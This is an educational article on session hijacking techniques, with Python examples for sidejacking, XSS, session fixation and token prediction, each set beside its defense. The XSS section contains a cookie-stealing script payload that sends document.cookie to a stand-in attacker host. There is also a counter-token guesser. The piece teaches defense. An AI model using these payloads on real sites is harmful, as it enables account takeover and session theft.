There are many ways in which a malicious actor can carry out a successful session hijacking attack. Broadly speaking, they can be categorized as either an active or passive attack. Another way to think about session hijacking methods is stealing a valid session token vs. faking a valid session token. Stealing usually involves intercepting user traffic, while faking requires the attacker to spoof a valid token or force a client to use a predetermined token.
Passive Attacks
In a passive attack the attacker only observes. They eavesdrop on the traffic between client and server (or on whatever a compromised network device or browser can see) and record what passes, including the session token, without altering anything.
Active Attacks
In an active attack the attacker interacts with the victim or the application rather than just listening: phishing or malware to obtain a token, script injected into a page, forged traffic, or a token forced onto the client in advance.
Let’s take a look at several specific methods that can be used to carry out a session hijacking attack.
Man-in-the-Middle (MITM) Attacks
Type: Passive Attack
Cybercriminals can use man-in-the-middle (MITM) attacks to intercept a session token. The attacker may use a compromised network device or an unsafe Wi-Fi connection to place themself between the target and the web server. From there they monitor the target’s network traffic, waiting for them to log in to a secured account. If the connection is not protected by TLS, or the attacker can strip or downgrade it, the authenticated session token is exposed in the clear; the attacker copies it into their own browser and gains access to the account.
There are multiple types of MITM attacks that malicious actors can use to execute session hijacking, including:
- IP Spoofing: The attacker sends Internet Protocol (IP) packets with a forged source address to pose as the authenticated client or as the server.
- Session Sidejacking: The attacker reads a session cookie that the browser sends over an unencrypted connection. This typically happens when a site protects only the login page with SSL/TLS and serves later pages over plain HTTP, or sets the session cookie without the Secure attribute, so the token travels in the clear even though the password never did.
- DNS Spoofing: The attacker poisons the cache of a Domain Name System (DNS) resolver, or answers DNS queries on the local network, so that the name of a trusted website resolves to a server they control, which then impersonates or proxies the real site.
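To make the sidejacking case concrete, here is an added example (not code from the original article) of the two sides of it: what an eavesdropper on a shared network recovers from a single plaintext HTTP request, and a check of the Set-Cookie attributes whose absence lets that happen. The captured request, hostname, cookie names and token value are all constructed for the example.

```python
"""Added example (not from the original article): what a passive eavesdropper
recovers from a plaintext HTTP request, and a check for the Set-Cookie
attributes whose absence makes session sidejacking possible."""

# Constructed sample: one HTTP request captured on a shared network. The host,
# cookie names and token value are made up for this example.
CAPTURED_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"Cookie: theme=dark; SESSIONID=9f3b2c7e1a4d; lang=en\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

# Cookie names that commonly carry a session identifier (lower-cased for matching).
SESSION_COOKIE_NAMES = {"sessionid", "phpsessid", "jsessionid", "asp.net_sessionid"}


def extract_session_cookies(raw_request: bytes) -> dict:
    """Return {name: value} for session-looking cookies in a raw HTTP request.

    This is all a sniffer has to do when the request is not protected by TLS:
    the Cookie header is plain text on the wire.
    """
    head, _, _body = raw_request.partition(b"\r\n\r\n")
    found = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.decode("latin-1").partition(":")
        if not sep or name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            cname, eq, cvalue = pair.strip().partition("=")
            if eq and cname.lower() in SESSION_COOKIE_NAMES:
                found[cname] = cvalue
    return found


def audit_set_cookie(set_cookie_value: str) -> list:
    """List the weaknesses of one Set-Cookie header value.

    Secure stops the browser sending the cookie over plain HTTP (the sidejacking
    case), HttpOnly keeps it out of document.cookie, SameSite limits cross-site
    sends. Returns an empty list when all three are present.
    """
    parts = [p.strip() for p in set_cookie_value.split(";")]
    attributes = {p.split("=", 1)[0].lower() for p in parts[1:]}
    problems = []
    if "secure" not in attributes:
        problems.append("missing Secure: cookie is also sent over plaintext HTTP")
    if "httponly" not in attributes:
        problems.append("missing HttpOnly: cookie is readable from page script")
    if "samesite" not in attributes:
        problems.append("missing SameSite: cookie is sent on cross-site requests")
    return problems


if __name__ == "__main__":
    print("sniffed:", extract_session_cookies(CAPTURED_REQUEST))
    for header in ("SESSIONID=9f3b2c7e1a4d; Path=/",
                   "SESSIONID=9f3b2c7e1a4d; Path=/; Secure; HttpOnly; SameSite=Lax"):
        print(header, "->", audit_set_cookie(header) or "ok")
```

Serving the whole site over HTTPS (with HSTS) removes the plaintext request altogether; the Secure attribute is the backstop that keeps the browser from ever sending the session cookie over HTTP even if a link or redirect to http:// slips through.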
Adversary-in-the-Middle (AITM) Attacks
Type: Active Attack
Adversary-in-the-middle (AITM) attacks can be thought of as an evolution of MITM. Where a classic MITM eavesdrops, an AITM attacker manipulates the data in transit. In the common phishing form, the attacker runs a reverse proxy that relays the victim’s requests to the real login page and the responses back, so the victim sees the genuine site, completes login and even multi-factor authentication, and the attacker captures the credentials and the resulting session cookie as they pass through. The attacker can also alter the content the victim receives, for example injecting malicious script or a malware download, which can in turn grant them access to even more data.
Cross-Site Scripting (XSS)
Type: Active Attack
Cross-site scripting takes advantage of web application vulnerabilities to deliver malicious client-side scripts to unsuspecting users. The attacker injects the script into a trusted website, which then serves it to the user. Because the script arrives from the site itself, the browser runs it with that site’s origin, so the same-origin policy does not stand in its way. The script reads the target’s session token (for example from document.cookie, if the session cookie lacks the HttpOnly attribute) and sends it to the attacker, who can use it to gain control of the target’s account. This type of attack is particularly prevalent, as it can be used on any web application that reflects or stores user input in its output without encoding it.
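As an added example (not code from the original article), the following renders the same user-supplied comment through a vulnerable template and through one that HTML-encodes the input. The payload is constructed for the example and the exfiltration hostname is made up; the rendering functions are illustrative, not any framework’s own.

```python
"""Added example (not from the original article): the same comment rendered by
a vulnerable template and by one that HTML-encodes user input."""
import html

# Constructed payload of the kind the section describes: if it runs, it sends
# document.cookie to a host the attacker controls (hostname is made up).
PAYLOAD = ("<script>new Image().src="
           "'https://attacker.example/c?'+encodeURIComponent(document.cookie)</script>")


def render_comment_vulnerable(author: str, text: str) -> str:
    """Concatenates user input straight into HTML: markup in the input becomes
    markup in the page, so the <script> executes in the site's origin."""
    return f"<div class='comment'><b>{author}</b>: {text}</div>"


def render_comment_safe(author: str, text: str) -> str:
    """Encodes every character that could start or end a tag or attribute, so
    the browser shows the payload as text instead of executing it."""
    return (f"<div class='comment'><b>{html.escape(author, quote=True)}</b>: "
            f"{html.escape(text, quote=True)}</div>")


def contains_script_tag(page: str) -> bool:
    """Check used by this example: does the rendered HTML contain a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    for render in (render_comment_vulnerable, render_comment_safe):
        page = render("mallory", PAYLOAD)
        print(render.__name__, "executes script:", contains_script_tag(page))
```

Output encoding is the primary fix, and it must match the context the data lands in (HTML body here; attribute, JavaScript and URL contexts each need their own encoding). Marking the session cookie HttpOnly is the second layer: even if a script does run, document.cookie will not contain the token.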
Session Fixation
Type: Active Attack
Rather than steal a client’s session token, session fixation gains access to an account by forcing the target to use a token that is already known to the attacker. It relies on two weaknesses: the application accepts a session ID supplied by the client (typically in the URL), and it keeps that same ID when the user logs in. The cybercriminal sends the client a phishing link to the target web server that already contains the chosen token. When the client logs in using that link, their authenticated session is bound to the token the attacker chose. By presenting that same token, the attacker now has access to the target’s account.
This works even if the web server only accepts server-generated session tokens. The attacker simply visits the web server to be issued an ID, then sends the client a link carrying that ID in the URL. Once the client has logged in, the attacker gains access. The defense is to issue a new session ID at the moment of authentication and invalidate the old one, so whatever the attacker planted is worthless afterwards.
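The following added example (not code from the original article or any web framework) plays out exactly that sequence against a toy in-memory session store, once with a login that keeps the pre-authentication ID and once with one that regenerates it. The credential, username and phishing URL are constructed.

```python
"""Added example (not from the original article or any framework): a toy
session store that plays out session fixation, once with a login that keeps
the pre-authentication ID (vulnerable) and once that regenerates it."""
import secrets

VALID_PASSWORD = "correct-horse"   # constructed credential for the example


class SessionStore:
    def __init__(self, regenerate_on_login: bool):
        self.sessions = {}                  # session id -> {"user": username or None}
        self.regenerate_on_login = regenerate_on_login

    def request(self, presented_sid=None) -> str:
        """Model one request. The app accepts any known ID the client presents,
        whether it came from a cookie or from a ?sid= URL parameter, and issues
        a fresh anonymous ID otherwise."""
        if presented_sid in self.sessions:
            return presented_sid
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, username: str, password: str) -> str:
        """Authenticate the session and return the ID the client should use afterwards."""
        if password != VALID_PASSWORD or sid not in self.sessions:
            return sid
        if self.regenerate_on_login:
            # Hardened: discard the pre-auth ID and bind the user to a brand new one.
            del self.sessions[sid]
            sid = secrets.token_urlsafe(32)
            self.sessions[sid] = {"user": username}
        else:
            # Vulnerable: whoever already knows this ID now holds an authenticated session.
            self.sessions[sid]["user"] = username
        return sid

    def whoami(self, sid: str):
        return self.sessions.get(sid, {}).get("user")


def run_fixation_attack(store: SessionStore):
    """Return the username the attacker's planted ID resolves to after the victim logs in."""
    # 1. Attacker visits the site and receives a valid, anonymous server-generated ID.
    planted_sid = store.request()
    # 2. Victim opens the phishing link https://shop.example/login?sid=<planted_sid>
    #    (constructed URL); the server accepts the presented ID.
    victim_sid = store.request(planted_sid)
    # 3. Victim logs in with real credentials.
    store.login(victim_sid, "alice", VALID_PASSWORD)
    # 4. Attacker replays the ID they chose in step 1.
    return store.whoami(planted_sid)


if __name__ == "__main__":
    print("vulnerable:", run_fixation_attack(SessionStore(regenerate_on_login=False)))
    print("hardened:  ", run_fixation_attack(SessionStore(regenerate_on_login=True)))
```

In the vulnerable store the attacker’s ID resolves to alice after her login; in the hardened store it resolves to nothing, because login deleted it. Refusing session IDs from the URL closes the planting step as well, but regenerating at login is the control that works regardless of how the ID was planted.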
Cookie Theft
Type: Active Attack
Cookie theft uses phishing or malware to steal a client’s session cookie once they have logged in to a secured web server. Information-stealing malware typically reads the browser’s cookie store directly, collecting tokens for every site the user is logged in to; because the session is already authenticated, replaying the cookie bypasses both the password and any multi-factor step that already took place.
Session Token Prediction
Type: Active Attack
In this type of session hijacking attack, the cybercriminal does not need to steal an authenticated session token. Instead, they gain access by predicting what a valid token will look like.
Web applications that generate session tokens pull from a specific set of data to create the token, sometimes using predictable information such as the client username, the current time, or a counter. For example, a session token string might include a variable like “client501” that is incremented for each new token generated. By collecting a handful of their own tokens, the attacker can work out the structure and predict what other valid IDs look like (e.g., “client502” and so on); when the structure is a counter, no sophisticated analysis is needed. From there it’s only a matter of trying candidate IDs until one is accepted. The defense is to generate session tokens from a cryptographically secure random number generator with enough entropy (OWASP recommends at least 64 bits) so that the tokens an attacker observes reveal nothing about the next one.
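As an added example (not code from the original article), the following recovers the counter pattern from a few observed tokens of the “client501” kind and guesses the ones that follow, then runs the same guesser over tokens from a CSPRNG to show that there is nothing to recover. The observed tokens are constructed; the guesser is general enough to handle any fixed prefix and any constant step, which goes slightly beyond the single increment-by-one case in the text.

```python
"""Added example (not from the original article): recovering the pattern of
counter-based session tokens and guessing the next ones, beside a generator
that leaves nothing to predict."""
import re
import secrets

# Constructed sample: tokens collected by logging in four times in a row against
# a server that builds IDs from a fixed prefix and an incrementing counter.
OBSERVED_WEAK = ["client498", "client499", "client500", "client501"]


def predict_next_tokens(observed: list, how_many: int = 3) -> list:
    """Split each token into a non-digit prefix and a trailing number. If the
    prefix is constant and the numbers advance by a fixed step, return the
    next `how_many` tokens; otherwise return [] (no pattern found)."""
    parsed = []
    for token in observed:
        match = re.fullmatch(r"(\D*)(\d+)", token)
        if match is None:
            return []
        parsed.append((match.group(1), int(match.group(2))))
    prefixes = {prefix for prefix, _ in parsed}
    numbers = [number for _, number in parsed]
    steps = {b - a for a, b in zip(numbers, numbers[1:])}
    if len(prefixes) != 1 or len(steps) != 1:
        return []
    prefix, step = prefixes.pop(), steps.pop()
    return [f"{prefix}{numbers[-1] + step * i}" for i in range(1, how_many + 1)]


def strong_token() -> str:
    """256 bits from the OS CSPRNG, base64url encoded (43 characters): the only
    way to find a valid one is to guess among 2**256 possibilities."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    print("weak, next guesses:  ", predict_next_tokens(OBSERVED_WEAK))
    print("strong, next guesses:", predict_next_tokens([strong_token() for _ in range(4)]))
```

A token built from a username, timestamp or counter can be long and still have only a few bits of real uncertainty; length is not entropy. Use the platform’s CSPRNG (secrets here, not random), and treat a session ID as a pure random identifier rather than something that encodes information about the user.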